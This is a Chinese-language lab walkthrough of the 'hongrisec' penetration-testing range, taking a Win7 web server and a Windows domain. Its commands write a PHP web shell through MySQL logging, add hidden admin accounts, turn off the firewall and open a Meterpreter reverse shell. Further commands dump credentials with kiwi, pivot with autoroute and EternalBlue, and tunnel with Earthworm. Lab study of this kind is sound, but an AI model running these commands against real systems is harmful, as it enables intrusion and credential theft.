活得久爬得高的坏人,往往不会蠢,这是一件让人很无奈的事情
下载后解压出三个文件夹,分别对应三台靶机,密码都是`hongrisec@2019`,但只有win7可以进
kali(自带) 攻击机
win7 web服务器
server08 域控
win2003 域成员
用VMware,打开文件夹中.vmx文件
kali网卡 ---- -----net模式
server2008-----VMware1
win2003---------VMware1
win7--------------两个网卡
win7是web服务器,连接着外网和内网,所以需要两个网卡
第一个网卡选择------VMwear1(仅主机模式)用于内网
第二个网卡选择------net模式用于外网
使用hongrisec@2019登陆后,打开phpstudy中,apache和MySQL服务
C段扫描
端口扫描
目录扫描
扫出三个有效的目录
/phpmyadmin
/phpinfo.php
/l.php
1.从这三个目录中可以得到php的版本5.4.45
2.网站的绝对路径是C:/phpStudy/WWW
3.phpmyadmin是后台,可以尝试弱密码爆破(账号密码都是root
)
…
报错提示,要使用into outfile函数,secure_file_priv函数要为ON
且不能被set global修改,只能在my.ini或my.conf配置文件中修改
查看日志的状态
show variables like ‘%general%’;
修改日志状态
set global general_log=‘ON’; 执行再次查看日志状态
成功修改后,将日志转移到网站根目录下
set global general_log_file=‘C:/phpStudy/WWW/lzh.php’;
lzh.php是自己随便命名的
然后加入一句话木马
select ‘<?php @eval($_POST[c]);?>’
net user lzh$ 123456lzh@ /add 创建隐藏用户
net localgroup administrators lzh$ /add 将用户加入管理员组
net user lzh$ /active:yes 激活用户
netsh advfirewall show allprofile state 查看防火墙状态
netsh advfirewall set allprofile state off 关闭防火墙
whoami查看还是administrator权限
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=6666 -f exe -o hacker.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.32.128
set lport 6666
run
运行hacker.exe
shell
chcp 65001 修复乱码
ipconfig /all
显示所有网络适配器
主机名为stu1,内网网段为192.168.52.143
net user /domain
查看域用户
域内有5个用户
net group “domain admins” /domain ------查看域管理员
net config workstation ---------查看当前的域的信息
net time /domain ----------查找域控
得到域名,通过ping,解析域名的IP地址
192.168.52.138
net view /domain ---------查看本机的域
net view ---------查看当前域中计算机的名称
经过以上内网信息收集,得到
域内有3台主机,
//OWA,域控:192.168.52.138
//ROOT-TVI862UBEH,域成员:192.168.52.141
//STU1win7:192.168.52.143
域内有5个用户
Administrator | Guest | krbtgt | ligang | liukaifeng01
1| getuid 查看当前权限
2| getsystem 提权
3| getuid 验证提权
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中
1.首先ps查看进程
2.找一个user为system的进程----PID
3.migrate 508
4.load kiwi加载kiwi模块
5.creds_all这里密码我自己改过
> 使用autoroute模块,它的功能是添加去内网路由
> run post/multi/manage/autoroute 查看当前路由信息
> run autoroute -s 192.168.10.0/24 添加路由
> run autoroute -p 查看路由信息
background相当于存档,使用session -i,可以回到存档时的位置
路由添加完成之后,就是扫描内网主机的端口
search portscan
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141 添加目标主机的IP地址
set ports 22,445,3389 添加要扫描的端口,可以更多
run
发现两台主机都开放了,445端口,想到用永恒之蓝试一下
可以看到两台主机都有永恒之蓝的漏洞
使用模块command
添加用户
use 2
set rhosts 192.168.52.138
set command net user hacker 123456hack! /add
run
将用户添加到管理员组
set command net localgroup Administrators hacker /add
run
开启远程桌面
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run
ew(Earthworm)内网穿透工具
git clone https://github.com/idlefire/ew.git
kali
./ew_for_linux64 -s rcsocks -l 5656 -e 9999
meterpreter
ew_for_Win.exe -s rssocks -d 192.168.32.128 -e 9999
开全局代理:setg proxies socks5:127.0.0.1:5656
这里不知道为什么会报错,也查了资料,一无所获,就放弃了,